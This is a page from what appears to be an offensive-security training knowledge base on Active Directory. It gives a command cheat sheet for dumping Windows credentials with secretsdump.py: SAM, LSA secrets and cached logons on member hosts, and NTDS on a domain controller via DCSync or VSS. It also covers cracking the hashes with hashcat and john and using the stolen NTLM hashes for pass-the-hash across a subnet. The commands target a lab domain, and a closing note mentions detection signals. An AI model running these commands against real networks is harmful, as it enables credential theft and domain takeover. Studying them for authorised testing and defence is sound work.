Operator On The Wire
← Back to Knowledge Base
OOTW / Chapter IV - Active Directory / 04. Techniques / Secrets / Techniques

NTDS and Local Secrets

Host secret dumping targets local credential stores. On workstations and servers, we usually dump SAM, LSA secrets, and cached domain logons. On a domain controller, we target NTDS either through DCSync, VSS, or offline files.

Dump a member host with plaintext credentials

secretsdump.py 'ootw.local/student:student@10.10.10.201'

Dump a member host with pass-the-hash

secretsdump.py 'ootw.local/student@10.10.10.201' -hashes :NTLM_HASH

Dump a member host with Kerberos

export KRB5CCNAME=student.ccache
secretsdump.py -k -no-pass 'ootw.local/student@ws01.ootw.local'

Expected member-host output

SAM hashes
LSA secrets
Cached domain logons
DPAPI system material
Service account material when present

Dump DC with DRSUAPI

secretsdump.py 'ootw.local/Administrator:Student123!@10.10.10.200' -just-dc -dc-ip 10.10.10.200 -outputfile ntds

Dump DC with VSS

secretsdump.py 'ootw.local/Administrator:Student123!@10.10.10.200' -use-vss -dc-ip 10.10.10.200 -outputfile ntds_vss

Offline local hive parsing

secretsdump.py -sam SAM -system SYSTEM -security SECURITY LOCAL

Offline NTDS parsing

secretsdump.py -ntds ntds.dit -system SYSTEM -security SECURITY LOCAL

Crack extracted hashes

hashcat -m 1000 hashes.ntlm /usr/share/wordlists/rockyou.txt
hashcat -m 2100 hashes.mscache2 /usr/share/wordlists/rockyou.txt
john --format=NT --wordlist=/usr/share/wordlists/rockyou.txt hashes.ntlm

Use extracted NTLM

nxc smb 10.10.10.0/24 -u localadmin -H NTLM_HASH --local-auth
nxc smb 10.10.10.0/24 -d ootw.local -u domainuser -H NTLM_HASH

Notes

Local admin is enough for SAM/LSA on a member host. Domain replication rights or DC-level access is needed for domain credential material.

-use-vss is noisy because it creates shadow-copy activity. DRSUAPI/DCSync is also high-signal when performed by an unexpected account.